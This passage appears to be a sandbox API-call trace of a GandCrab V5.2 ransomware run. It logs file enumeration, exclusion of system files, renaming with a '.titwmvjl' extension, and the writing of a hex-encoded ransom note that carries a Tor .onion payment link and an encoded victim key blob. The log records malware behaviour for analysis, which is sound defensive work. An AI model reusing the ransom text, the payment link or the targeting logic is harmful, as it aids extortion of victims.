x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0067.504] WriteFile (in: hFile=0x218, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259fa30, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259fa30*=0x2162, lpOverlapped=0x0) returned 1 [0067.504] CloseHandle (hObject=0x218) returned 1 [0067.504] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.505] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.505] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xc, wMilliseconds=0x334)) [0067.505] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.505] GetWindowsDirectoryW (in: lpBuffer=0x2610000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0067.505] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2610200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2610600, lpMaximumComponentLength=0x2610608, lpFileSystemFlags=0x2610604, lpFileSystemNameBuffer=0x2610400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2610600*=0xd2ca4def, lpMaximumComponentLength=0x2610608*=0xff, lpFileSystemFlags=0x2610604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0067.505] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock") returned 38 [0067.505] CreateFileW (lpFileName="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\config.msi\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x218 [0067.506] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.506] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.506] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0067.506] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*" | out: lpString1="C:\\Config.Msi\\*") returned="C:\\Config.Msi\\*" [0067.506] FindFirstFileExW (in: lpFileName="C:\\Config.Msi\\*", fInfoLevelId=0x1, lpFindFileData=0x259fa4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259fa4c) returned 0x4c9d38 [0067.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0067.506] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.506] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0067.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0067.506] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.506] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.506] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.506] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock" [0067.506] lstrlenW (lpString=".titwmvjl") returned 9 [0067.506] lstrlenW (lpString="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock") returned 38 [0067.506] VirtualAlloc (lpAddress=0x0, dwSize=0x8c, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.506] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 47 [0067.507] lstrlenW (lpString="C:\\Config.Msi\\d2ca4a09d2ca4deb61a.lock") returned 38 [0067.507] lstrlenW (lpString=".lock") returned 5 [0067.507] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.507] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.507] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.507] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.507] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 1 [0067.507] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0067.507] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0067.507] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt") returned="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt" [0067.507] lstrlenW (lpString=".titwmvjl") returned 9 [0067.507] lstrlenW (lpString="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt") returned 34 [0067.507] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.507] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 43 [0067.507] lstrlenW (lpString="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt") returned 34 [0067.507] lstrlenW (lpString=".txt") returned 4 [0067.507] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.508] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".txt ") returned 5 [0067.508] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0067.508] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.508] lstrlenW (lpString="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt") returned 34 [0067.508] lstrlenW (lpString="C:\\Config.Msi\\TITWMVJL-DECRYPT.txt") returned 34 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0067.508] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0067.508] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.508] FindNextFileW (in: hFindFile=0x4c9d38, lpFindFileData=0x259fa4c | out: lpFindFileData=0x259fa4c) returned 0 [0067.508] FindClose (in: hFindFile=0x4c9d38 | out: hFindFile=0x4c9d38) returned 1 [0067.508] CloseHandle (hObject=0x218) returned 1 [0067.509] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.509] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0067.509] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0067.509] lstrcatW (in: lpString1="C:\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\d2ca4a09d2ca4deb61a.lock") returned="C:\\d2ca4a09d2ca4deb61a.lock" [0067.509] lstrlenW (lpString=".titwmvjl") returned 9 [0067.509] lstrlenW (lpString="C:\\d2ca4a09d2ca4deb61a.lock") returned 27 [0067.509] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.509] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 36 [0067.509] lstrlenW (lpString="C:\\d2ca4a09d2ca4deb61a.lock") returned 27 [0067.509] lstrlenW (lpString=".lock") returned 5 [0067.509] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2610000 [0067.509] wsprintfW (in: param_1=0x2610000, param_2="%ws " | out: param_1=".lock ") returned 6 [0067.509] VirtualFree (lpAddress=0x2610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.509] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.509] FindNextFileW (in: hFindFile=0x4c9cf8, lpFindFileData=0x259fce0 | out: lpFindFileData=0x259fce0) returned 1 [0067.509] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0067.509] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0067.510] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings" | out: lpString1="C:\\Documents and Settings") returned="C:\\Documents and Settings" [0067.510] lstrcatW (in: lpString1="C:\\Documents and Settings", lpString2="\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0067.510] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0067.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0067.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0067.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0067.510] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0067.510] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0067.511] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.511] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0067.511] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Documents and Settings\\\\TITWMVJL-DECRYPT.txt") returned 47 [0067.511] CreateFileW (lpFileName="C:\\Documents and Settings\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\documents and settings\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0067.511] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55